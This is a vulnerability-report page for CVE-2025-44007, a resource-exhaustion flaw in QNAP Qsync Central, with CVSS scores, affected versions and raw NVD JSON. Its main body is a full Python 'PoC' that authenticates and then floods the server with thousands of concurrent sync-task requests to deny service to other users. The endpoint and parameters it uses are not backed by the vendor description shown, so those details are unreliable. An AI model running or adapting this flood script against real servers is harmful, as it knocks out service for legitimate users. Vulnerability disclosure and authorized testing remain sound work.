Security Vulnerability Report
中文
CVE-2025-44007 CVSS 6.5 MEDIUM

CVE-2025-44007

Published: 2025-10-03 18:15:35
Last Modified: 2025-10-08 15:18:41
Source: [email protected]

Description

An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following version: Qsync Central 5.0.0.1 ( 2025/07/09 ) and later

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:qsync_central:*:*:*:*:*:*:*:* - VULNERABLE
QNAP Qsync Central < 5.0.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-44007 - QNAP Qsync Central Resource Exhaustion PoC # This PoC demonstrates how an authenticated attacker can exhaust # server resources by sending a large number of resource-consuming requests. import requests import threading import time import sys from concurrent.futures import ThreadPoolExecutor, as_completed # Configuration TARGET_HOST = "https://qsync-target.example.com" # Target Qsync Central server USERNAME = "victim_user" # Valid Qsync account PASSWORD = "P@ssw0rd!" # Account password SYNC_FOLDER = "/test_sync" # Sync folder path MAX_THREADS = 50 # Number of concurrent threads REQUESTS_PER_THREAD = 200 # Requests per thread class QsyncResourceExhaustion: """PoC for CVE-2025-44007: Allocation of Resources Without Limits or Throttling""" def __init__(self, host, username, password): self.host = host.rstrip("/") self.username = username self.password = password self.session = requests.Session() self.session.verify = False self.success_count = 0 self.fail_count = 0 self.lock = threading.Lock() def authenticate(self): """Authenticate to Qsync Central and obtain session cookie""" login_url = f"{self.host}/cgi-bin/qsync/qsync.cgi" payload = { "action": "login", "username": self.username, "password": self.password } try: resp = self.session.post(login_url, data=payload, timeout=10) if resp.status_code == 200 and "sid" in self.session.cookies: print(f"[+] Authenticated successfully as {self.username}") return True print(f"[-] Authentication failed: {resp.status_code}") return False except Exception as e: print(f"[-] Connection error during auth: {e}") return False def create_sync_session(self, thread_id, req_id): """Repeatedly create sync sessions to exhaust server resources""" url = f"{self.host}/cgi-bin/qsync/qsync.cgi" params = { "action": "create_sync_task", "folder": SYNC_FOLDER, "mode": "continuous", "conflict_policy": "rename" } try: resp = self.session.post(url, params=params, timeout=15) with self.lock: if resp.status_code == 200: self.success_count += 1 else: self.fail_count += 1 return resp.status_code except requests.exceptions.Timeout: with self.lock: self.fail_count += 1 return None except Exception: with self.lock: self.fail_count += 1 return None def run_exhaustion(self): """Launch multi-threaded resource exhaustion attack""" print(f"[*] Starting resource exhaustion with {MAX_THREADS} threads") print(f"[*] Target: {self.host}") print(f"[*] Sending {MAX_THREADS * REQUESTS_PER_THREAD} total requests...") start_time = time.time() with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: futures = [] for t in range(MAX_THREADS): for r in range(REQUESTS_PER_THREAD): futures.append( executor.submit(self.create_sync_session, t, r) ) for future in as_completed(futures): pass # Results tracked via counters elapsed = time.time() - start_time print(f"\n[+] Attack completed in {elapsed:.2f}s") print(f"[+] Successful requests: {self.success_count}") print(f"[+] Failed/timeout requests: {self.fail_count}") if self.fail_count > self.success_count * 0.3: print("[!] Server appears to be experiencing resource exhaustion!") def main(): requests.packages.urllib3.disable_warnings() if len(sys.argv) >= 4: target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] else: target = TARGET_HOST username = USERNAME password = PASSWORD exploit = QsyncResourceExhaustion(target, username, password) if exploit.authenticate(): exploit.run_exhaustion() else: print("[-] Exiting: authentication required for this vulnerability") sys.exit(1) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-44007", "sourceIdentifier": "[email protected]", "published": "2025-10-03T18:15:35.383", "lastModified": "2025-10-08T15:18:41.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.1 ( 2025/07/09 ) and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qsync_central:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0.0", "versionEndExcluding": "5.0.0.1", "matchCriteriaId": "1CCFCB2F-05FA-460B-BD0D-966E7CE58D8A"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-34", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.